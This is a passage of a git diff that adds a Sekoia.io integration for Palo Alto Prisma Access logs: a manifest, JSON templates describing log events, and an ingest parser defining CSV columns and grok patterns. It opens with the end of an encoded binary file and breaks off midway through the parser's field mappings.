zTi`_+aLLi+N#4O`PuKdkuVehZ*Ddjz@F$kj2iYN0wgGPJ;$-2U_Z%bf4ThM7a|(#w
zc5zP<L&sIhO*Kbx^~h(cSU*4vX+IZMppwJWcdWp}_Yy$~9u(H;G)H)ZTQ=n<&63|~
z3wJfQ84?}pa2dCL7i?+Hp+!E2ol>r`?@ue4T7K)z%bAvlX6s=FDr53$I7tYFRT(HE
z=)_Kgw>mmOSk0(E5Gx`RKV+x_nuHqh;!H4!jTY<{edrgDAUf&?c;PZ!Fi;QkikKk8
zzoFuQ++3zv1K=eV**iJjYRgV^t1g}K>Dz!>-kW{P#9_-Tfx}s%uU{i2)9}4oxbH<L
z>#Nn}ytKY3)>S*W5-ncj3~S-vZL@3CGTEzqA|byvW-YwH49t4)I7yh`=_TToZvUnD
zLORy7xd89v);U^B^oRu8e+y;^&Q?^iX{`RkB;q^Rp{*Q}HA}7#)-}$Lq|>T^O}PqL
z*&Lso66Ve+>>(oPw_j@`nGMy!yh4xgjRdaY6#{SMwUyFBv$`6}*kO>c3hSNCR&=nR
zfjKRf;o7ejU2Kq~3W!R%28|iA$tTf;;m`kb(dt^`Q*On($-Vf>KbgBsZ>rwkX}YZX
zjrtI-3RlsutIWwO)&%8re8jveSJ{m(W@<T^+h}*T9y}*NyxY+t{DR8qUWLt%_PCqu
zN)3I2q-K#sr%o^I$pkhq)t2or`J8}yUM6E^dO4Q-FPPAL@Jy-I{EWH>0U@7!)xXkF
olX42peHh}w`TzHUls`*73~=%XEFEkk-W>ucDX7cW$(l$0AMxvZDgXcg

literal 0
HcmV?d00001

diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml b/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml
new file mode 100644
index 000000000..aefbc2559
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml	
@@ -0,0 +1,12 @@
+uuid: ea265b9d-fb48-4e92-9c26-dcfbf937b630 
+name: Palo Alto Prisma access
+slug: paloalto-prisma-access
+description: >-
+  Palo Alto Prisma Access is a cloud-delivered security platform that provides secure access to applications and data, using a scalable network to protect users and devices across all locations. It integrates advanced threat prevention and access controls to ensure consistent security policies.
+
+  Sending Palo Alto logs to Sekoia.io allows to discover potential network security threats.
+data_sources:
+  Network protocol analysis: Prisma access can monitor network traffic
+  Authentication logs: Prisma Access monitor authentications to resources
+  Web logs: Prisma Access monitor and logs HTTP requests
+  Web application firewall logs: Prisma Access monitor and logs network traffic
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json b/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json
new file mode 100644
index 000000000..44dfb75d1
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json	
@@ -0,0 +1,721 @@
+[
+  {
+    "value": "{event.reason}",
+    "conditions": [
+      {
+        "field": "event.reason"
+      }
+    ]
+  },
+  {
+    "value": "Connection from {source.ip} to host {host.name} {destination.ip}:{destination.port} matched the rule {rule.name}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "destination.ip"
+      },
+      {
+        "field": "destination.port"
+      },
+      {
+        "field": "rule.name"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      },
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "connected from"
+      },
+      {
+        "source": "destination.ip",
+        "target": "host.name",
+        "type": "associated with"
+      },
+      {
+        "source": "process.name",
+        "target": "source.ip",
+        "type": "running on"
+      }
+    ]
+  },
+  {
+    "value": "{user.name} from {source.ip} was classified as {paloalto.PanOSQuarantineReason} because of {event.reason}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "globalprotect"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "paloalto.PanOSQuarantineReason"
+      },
+      {
+        "field": "event.reason"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "connected from"
+      }
+    ]
+  },
+  {
+    "value": "{action.type}:{event.type} for {user.name} from {source.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "userid"
+      },
+      {
+        "field": "action.type",
+        "value": "login"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "source.ip"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "login from"
+      }
+    ]
+  },
+  {
+    "value": "{action.type}:{event.type} for {user.name} from {source.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "userid"
+      },
+      {
+        "field": "action.type",
+        "value": "logout"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "source.ip"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "logout from"
+      }
+    ]
+  },
+  {
+    "value": "{event.action} threat between {source.ip} and {destination.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "threat"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "destination.ip"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "{event.action} threat between {source.nat.ip} and {destination.nat.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "threat"
+      },
+      {
+        "field": "source.nat.ip"
+      },
+      {
+        "field": "destination.nat.ip"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "{log.logger} type {paloalto.PanOSThreatID} detected from {source.ip} user {user.name} to {destination.ip}:{destination.port} targeting host {host.name}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "threat"
+      },
+      {
+        "field": "paloalto.PanOSThreatID"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "destination.ip"
+      },
+      {
+        "field": "destination.port"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session denied between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "deny"
+      },
+      {
+        "field": "network.transport",
+        "value": "udp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "was denied a connection to"
+      }
+    ]
+  },
+  {
+    "value": "{network.transport} traffic from {source.ip} to {destination.ip} ({host.name}).",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "network.transport",
+        "value": "icmp"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "destination.ip"
+      },
+      {
+        "field": "host.name"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "ICMP traffic to"
+      }
+    ]
+  },
+  {
+    "value": "Session dropped between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "drop"
+      },
+      {
+        "field": "network.transport",
+        "value": "udp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "was denied a connection to"
+      }
+    ]
+  },
+  {
+    "value": "Session ended between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "end"
+      },
+      {
+        "field": "network.transport",
+        "value": "udp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session started between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "start"
+      },
+      {
+        "field": "network.transport",
+        "value": "udp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session denied between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "deny"
+      },
+      {
+        "field": "network.transport",
+        "value": "tcp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "was denied a connection to"
+      }
+    ]
+  },
+  {
+    "value": "Session dropped between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "drop"
+      },
+      {
+        "field": "network.transport",
+        "value": "tcp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "was denied a connection to"
+      }
+    ]
+  },
+  {
+    "value": "Session ended between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "end"
+      },
+      {
+        "field": "network.transport",
+        "value": "tcp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session started between {source.ip}:{source.port} and {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "start"
+      },
+      {
+        "field": "network.transport",
+        "value": "tcp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session denied between {source.ip} and {destination.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "deny"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "was denied a connection to"
+      }
+    ]
+  },
+  {
+    "value": "Session dropped between {source.ip} and {destination.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "drop"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "was denied a connection to"
+      }
+    ]
+  },
+  {
+    "value": "Session ended between {source.ip} and {destination.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "end"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session started between {source.ip} and {destination.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "start"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "Session started between {source.ip} and {destination.ip}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "traffic"
+      },
+      {
+        "field": "action.type",
+        "value": "start"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "{user.name} from {source.ip} connected through {network.type}",
+    "conditions": [
+      {
+        "field": "event.category",
+        "value": "session"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "network.type"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "connected from"
+      }
+    ]
+  },
+  {
+    "value": "{user.name} from {source.ip} connected",
+    "conditions": [
+      {
+        "field": "event.category",
+        "value": "session"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "source.ip"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "connected from"
+      }
+    ]
+  },
+  {
+    "value": "{source.address} logout from {destination.user.name} on {destination.address}",
+    "conditions": [
+      {
+        "field": "event.category",
+        "value": "authentication"
+      },
+      {
+        "field": "event.type",
+        "value": "end"
+      },
+      {
+        "field": "source.address"
+      },
+      {
+        "field": "destination.address"
+      },
+      {
+        "field": "destination.user.name"
+      }
+    ]
+  },
+  {
+    "value": "{source.address} connected with {destination.user.name} on {destination.address}",
+    "conditions": [
+      {
+        "field": "event.category",
+        "value": "authentication"
+      },
+      {
+        "field": "source.address"
+      },
+      {
+        "field": "destination.address"
+      },
+      {
+        "field": "destination.user.name"
+      }
+    ]
+  },
+  {
+    "value": "{host.mac} connected with {destination.user.name}",
+    "conditions": [
+      {
+        "field": "event.category",
+        "value": "authentication"
+      },
+      {
+        "field": "host.mac"
+      },
+      {
+        "field": "destination.user.name"
+      }
+    ]
+  },
+  {
+    "value": "Encrypted connection from {source.address} to {destination.address}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "decryption"
+      },
+      {
+        "field": "source.address"
+      },
+      {
+        "field": "destination.address"
+      }
+    ]
+  },
+  {
+    "value": "Host Information Profile from {source.address}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "hipmatch"
+      },
+      {
+        "field": "source.address"
+      }
+    ]
+  },
+  {
+    "value": "IPtag applied on {source.address}: {action.name}",
+    "conditions": [
+      {
+        "field": "log.logger",
+        "value": "hipmatch"
+      },
+      {
+        "field": "source.address"
+      },
+      {
+        "field": "action.name"
+      }
+    ]
+  },
+  {
+    "value": "Connection from {source.address} to {destination.address}",
+    "conditions": [
+      {
+        "field": "source.address"
+      },
+      {
+        "field": "destination.address"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.address",
+        "target": "destination.address",
+        "type": "connected to"
+      }
+    ]
+  },
+  {
+    "value": "{source.address} send DNS query {dns.question.type}. Resolution: {dns.resolved_ip}. Category: {paloalto.dns.category} ",
+    "conditions": [
+      {
+        "field": "source.address"
+      },
+      {
+        "field": "dns.question.type"
+      },
+      {
+        "field": "dns.resolved_ip"
+      },
+      {
+        "field": "paloalto.dns.category"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.address",
+        "target": "dns.resolved_ip",
+        "type": "queried dns resolution for"
+      }
+    ]
+  }
+]
diff --git a/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml
new file mode 100644
index 000000000..970bde48f
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml	
@@ -0,0 +1,880 @@
+name: Palo Alto Prisma access
+ignored_values: ["N/A", "unknown"]
+pipeline:
+  - name: parsed_event
+    external:
+      name: cef.parse-cef
+    filter: '{{original.message.startswith("CEF")}}'
+
+  # Just used to get the column format
+  - name: parsed_dsv
+    filter: '{{original.message.startswith("CEF") == False}}'
+    external:
+      name: dsv.parse-dsv
+      properties:
+        columnnames:
+          - tmp1
+          - ReceiveTime
+          - DeviceSN
+          - Type
+        delimiter: ","
+
+  # TRAFFIC CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'TRAFFIC'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - PaloAltoDomain
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - ConfigVersion
+          - GenerateTime
+          - SourceAddress
+          - DestinationAddress
+          - NATSourceIP
+          - NATDestinationIP
+          - Rule
+          - SourceUser
+          - DestinationUser
+          - Application
+          - VirtualLocation
+          - SourceZone
+          - DestinationZone
+          - InboundInterface
+          - OutboundInterface
+          - LogAction
+          - TimeLogged
+          - SessionID
+          - RepeatCount
+          - SourcePort
+          - DestinationPort
+          - NATSourcePort
+          - NATDestinationPort
+          - Flags
+          - IPProtocol
+          - Action
+          - Bytes
+          - BytesSent
+          - BytesReceived
+          - Packets
+          - StartTime
+          - ElapsedTimeInSec
+          - Category
+          - Padding
+          - seqno
+          - ActionFlags
+          - SourceLocation
+          - DestinationLocation
+          - cpadding
+          - pkts_sent
+          - pkts_received
+          - SessionEndReason
+          - DeviceGroupHierarchyLevel1
+          - DeviceGroupHierarchyLevel2
+          - DeviceGroupHierarchyLevel3
+          - DeviceGroupHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - ActionSource
+          - SourceVMUUID
+          - DestinationVMUUID
+          - TunnelID/IMSI
+          - MonitorTag/IMEI
+          - ParentSessionID
+          - ParentStartTime
+          - TunnelType
+          - SCTPAssociationID
+          - SCTPChunks
+          - SCTPChunksSent
+          - SCTPChunksReceived
+          - RuleUUID
+          - HTTP/2Connection
+          - AppFlapCount
+          - PolicyID
+          - LinkSwitches
+          - SD-WANCluster
+          - SD-WANDeviceType
+          - SD-WANClusterType
+          - SD-WANSite
+          - DynamicUserGroupName
+          - XFFAddress
+          - SourceDeviceCategory
+          - SourceDeviceProfile
+          - SourceDeviceModel
+          - SourceDeviceVendor
+          - SourceDeviceOSFamily
+          - SourceDeviceOSVersion
+          - SourceHostname
+          - SourceMacAddress
+          - DestinationDeviceCategory
+          - DestinationDeviceProfile
+          - DestinationDeviceModel
+          - DestinationDeviceVendor
+          - DestinationDeviceOSFamily
+          - DestinationDeviceOSVersion
+          - DestinationHostname
+          - DestinationMacAddress
+          - ContainerID
+          - PODNamespace
+          - PODName
+          - SourceExternalDynamicList
+          - DestinationExternalDynamicList
+          - HostID
+          - SerialNumber
+          - SourceDynamicAddressGroup
+          - DestinationDynamicAddressGroup
+          - SessionOwner
+          - HighResolutionTimestamp
+        delimiter: ","
+
+  # USERID CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'USERID'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - FUTURE_USER
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - FUTURE_USE
+          - GeneratedTime
+          - VirtualLocation
+          - SourceIP
+          - User
+          - DataSourceName
+          - EventID
+          - RepeatCount
+          - TimeOutThreshold
+          - SourcePort
+          - DestinationPort
+          - DataSource
+          - DataSourceType
+          - SequenceNumber
+          - ActionFlags
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - VirtualSystemID
+          - FactorType
+          - FactorCompletionTime
+          - FactorNumber
+          - UserGroupFlags
+          - UserbySource
+          - TagName
+          - HighResolutionTimestamp
+        delimiter: ","
+
+  # GLOBALPROTECT CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'GLOBALPROTECT'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - FUTURE_USE
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - FUTURE_USE
+          - GeneratedTime
+          - VirtualLocation
+          - EventID
+          - Stage
+          - AuthenticationMethod
+          - TunnelType
+          - SourceUser
+          - SourceLocation
+          - MachineName
+          - PublicIP
+          - PublicIPv6
+          - PrivateIP
+          - PrivateIPv6
+          - HostID
+          - DeviceSN
+          - ClientVersion
+          - ClientOS
+          - ClientOSVersion
+          - RepeatCount
+          - Reason
+          - Error
+          - EventDescription
+          - Status
+          - Location
+          - LoginDuration
+          - ConnectMethod
+          - ErrorCode
+          - Portal
+          - SequenceNumber
+          - ActionFlags
+          - HighResolutionTimestamp
+        delimiter: ","
+
+  # SYSTEM CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'SYSTEM'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - FUTURE_USE
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - FUTURE_USE
+          - GeneratedTime
+          - VirtualLocation
+          - EventID
+          - Object
+          - FUTURE_USE
+          - FUTURE_USE_2
+          - Module
+          - VendorSeverity
+          - EventDescription
+          - SequenceNumber
+          - ActionFlags
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - FUTURE_USE
+          - FUTURE_USE
+          - HighResolutionTimestamp
+        delimiter: ","
+
+  # THREAT CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'THREAT'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - PaloAltoDomain
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - ConfigVersion
+          - GenerateTime
+          - SourceAddress
+          - DestinationAddress
+          - NATSourceIP
+          - NATDestinationIP
+          - Rule
+          - SourceUser
+          - DestinationUser
+          - Application
+          - VirtualLocation
+          - SourceZone
+          - DestinationZone
+          - InboundInterface
+          - OutboundInterface
+          - LogAction
+          - TimeLogged
+          - SessionID
+          - RepeatCount
+          - SourcePort
+          - DestinationPort
+          - NATSourcePort
+          - NATDestinationPort
+          - Flags
+          - IPProtocol
+          - Action
+          - URLFilename
+          - Threat_ContentName
+          - Category
+          - VendorSeverity
+          - Direction
+          - seqno
+          - ActionFlags
+          - SourceLocation
+          - DestinationLocation
+          - cpadding
+          - ContentType
+          - PcapID
+          - FileDigest
+          - Cloud
+          - URLID
+          - UserAgent
+          - FileType
+          - xff
+          - Referer
+          - Sender
+          - Subject
+          - Recipient
+          - ReportID
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - FileURL
+          - SourceVMUUID
+          - DestinationVMUUID
+          - HttpMethod
+          - TunnelIDIMSI
+          - MonitorTagIMEI
+          - ParentSessionID
+          - ParentSessionStartTime
+          - Tunnel
+          - Threat_Category
+          - Contentver
+          - SigFlags
+          - SCTPAssociationID
+          - PayloadProtocolID
+          - HttpHeaders
+          - URLCategoryList
+          - RuleUUID
+          - HTTP/2Connection
+          - DynamicUserGroupName
+          - XFFAddress
+          - SourceDeviceCategory
+          - SourceDeviceProfile
+          - SourceDeviceModel
+          - SourceDeviceVendor
+          - SourceDeviceOSFamily
+          - SourceDeviceOSVersion
+          - SourceHostname
+          - SourceMACAddress
+          - DestinationDeviceCategory
+          - DestinationDeviceProfile
+          - DestinationDeviceModel
+          - DestinationDeviceVendor
+          - DestinationDeviceOSFamily
+          - DestinationDeviceOSVersion
+          - DestinationHostname
+          - DestinationMACAddress
+          - ContainerID
+          - PODNamespace
+          - PODName
+          - SourceExternalDynamicList
+          - DestinationExternalDynamicList
+          - HostID
+          - SerialNumber
+          - DomainEDL
+          - SourceDynamicAddressGroup
+          - DestinationDynamicAddressGroup
+          - PartialHash
+          - HighResolutionTimestamp
+        delimiter: ","
+
+  - name: parsed_timestamp
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{parsed_event.message.rt}}"
+        output_field: datetime
+        # ingest does not allow this stage to resolve Jinja template ATM
+        #timezone: '{{parsed_event.message.dtz}}'
+    filter: '{{parsed_event.message.get("rt") != None}}'
+
+  - name: parsed_start
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{parsed_event.message.start}}"
+        output_field: datetime
+        # ingest does not allow this stage to resolve Jinja template ATM
+        #timezone: '{{parsed_event.message.dtz}}'
+    filter: '{{parsed_event.message.get("start") != None}}'
+
+  # Parse JSON events
+  - name: parsed_event
+    external:
+      name: json.parse-json
+    filter: '{{original.message | re_match("^\\s*\\{.*\\}\\s*$")}}'
+
+  - name: parsed_timestamp
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{parsed_event.message.EventTime or parsed_event.message.TimeGenerated or parsed_event.message.ReceiveTime}}"
+        output_field: datetime
+    filter: '{{parsed_event.message.get("EventTime") != None or parsed_event.message.get("TimeGenerated") != None or parsed_event.message.get("ReceiveTime") != None}}'
+
+  - name: parsed_timestamp
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{parsed_event.message.HighResolutionTimestamp}}"
+        output_field: datetime
+    filter: '{{parsed_event.message.get("HighResolutionTimestamp") != None}}'
+
+  - name: parsed_start
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{parsed_event.message.SessionStartTime}}"
+        output_field: datetime
+    filter: '{{parsed_event.message.get("SessionStartTime") != None}}'
+
+  - name: parsed_description
+    external:
+      name: grok.match
+      properties:
+        input_field: "{{parsed_event.message.EventDescription}}"
+        pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}"
+        custom_patterns:
+          SYSTEM_AUTH_AUTHENTICATION_FOR: "authenticated for user '%{USERNAME:user}'.   auth profile '%{DATA:auth_profile}', vsys '%{DATA:vsys}', server profile '%{DATA:server_profile}', server address '%{HOSTNAME:server_address}', From: %{IP:src}."
+          CONNECTION: "%{CONNECTION_SUCCESS}|%{CONNECTION_TO_SERVER}|%{CONNECTION_REGISTERED}"
+          CONNECTION_SUCCESS: "Successfully connect to address: %{IP:dst} port: %{NUMBER:dport}, conn id: %{DATA:connection_id}"
+          CONNECTION_TO_SERVER: "Connection to %{DATA} server: %{DATA:dst_addr} completed successfully, initiated by %{IP:src}"
+          CONNECTION_REGISTERED: "Successfully registered to Public Cloud %{DATA:dst_domain}"
+          WILDFIRE: "%{WILDFIRE_GENERIC}|%{WILDFIRE_CLOUD_FAILED}"
+          WILDFIRE_NAME: "WildFire"
+          WILDFIRE_GENERIC: "%{WILDFIRE_NAME:module} %{DATA}"
+          WILDFIRE_CLOUD_FAILED: "Failed to perform task resulting in connection timeout with %{WILDFIRE_NAME:module} Cloud %{HOSTNAME:dst_domain}"
+          NETWORK: "%{DHCP_RENEW}|%{NTP_SYNC}|%{PORT_UP}"
+          DHCP_RENEW: "DHCP RENEW: interface %{NOTSPACE:intf}, ip %{IP:src} netmask %{IP} dhcp server: %{IPORHOST:dst_addr}"
+          NTP_SYNC: "NTP sync to server %{HOSTNAME:dst_addr}"
+          PORT_UP: "Port %{NOTSPACE:intf}: %{DATA:action} %{DATA}"
+          PANDB_NAME: "PAN-DB"
+          PANDB_GENERIC: "%{PANDB_NAME:module} %{DATA}"
+          CONTENT: "%{CONTENT_INSTALLATION}|%{CONTENT_UPDATE}|%{CONTENT_UPGRADE}"
+          CONTENT_INSTALLATION: "Installed %{NOTSPACE:module} package: %{DATA:filename}"
+          CONTENT_UPDATE: "Content update job succeeded  for user %{USERNAME:user}"
+          CONTENT_UPGRADE: "Content package upgraded from version %{DATA} by %{USERNAME:user}"
+          CLOUD_ELECTION: "CLOUD ELECTION: %{HOSTNAME:dst_domain} IP: %{IP:dst} was elected, %{DATA}."
+          AUTHENTICATION: "%{AUTHENTICATION_CONSOLE}|%{AUTHENTICATION_WEB}"
+          AUTHENTICATION_CONSOLE: "authenticated for user '%{USERNAME:user}'.   From: %{IP:src}."
+          AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
+    filter: '{{parsed_event.message.get("EventDescription") != None}}'
+
+  - name: parsed_threat
+    external:
+      name: grok.match
+      properties:
+        input_field: "{{parsed_event.message.Threat_ContentName}}"
+        pattern: '%{DATA:threat_description}?\(%{NUMBER:threat_code}\)'
+
+  - name: set_extracted_fields
+  - name: set_finalize_user_name
+  - name: set_category_fields
+  - name: set_ecs_deviceOutboundInterface
+    filter: '{{parsed_event.message.get("deviceOutboundInterface") != None}}'
+  - name: set_ecs_deviceInboundInterface
+    filter: '{{parsed_event.message.get("deviceInboundInterface") != None}}'
+  - name: set_action_outcome
+  - name: set_csv_severity
+
+stages:
+  set_csv_severity:
+    actions:
+      - set:
+          event.severity: "{{parsed_event.message.Severity}}"
+        filter: '{{original.message.startswith("CEF")}}'
+
+  set_ecs_deviceOutboundInterface:
+    actions:
+      - set:
+          observer.egress.interface.name: "{{parsed_event.message.deviceOutboundInterface}}"
+          observer.egress.interface.id: '{{parsed_event.message.deviceOutboundInterface.split("/") | last}}'
+
+  set_ecs_deviceInboundInterface:
+    actions:
+      - set:
+          observer.ingress.interface.name: "{{parsed_event.message.deviceInboundInterface | last}}"
+          observer.ingress.interface.id: '{{parsed_event.message.deviceOutboundInterface.split("/") | last}}'
+
+  set_action_outcome:
+    actions:
+      - set:
+          action.outcome: "{{parsed_event.message.Status}}"
+        filter: "{{parsed_event.message.Status != None}}"
+      - set:
+          action.outcome: "success"
+        filter: "{{parsed_event.message.Action != null}}"
+
+  set_extracted_fields:
+    actions:
+      - set:
+          "@timestamp": "{{parsed_timestamp.datetime}}"
+          event.start: "{{parsed_start.datetime}}"
+          action.name: "{{parsed_event.message.Action or parsed_description.message.action}}"
+          action.type: "{{parsed_event.message.Subtype|lower or parsed_event.message.Name|lower}}"
+          container.id: "{{parsed_event.message.ContainerID}}"
+          container.name: "{{parsed_event.message.ContainerName}}"
+          destination.address: "{{parsed_event.message.DestinationAddress or parsed_event.message.dst or parsed_description.message.dst_addr}}"
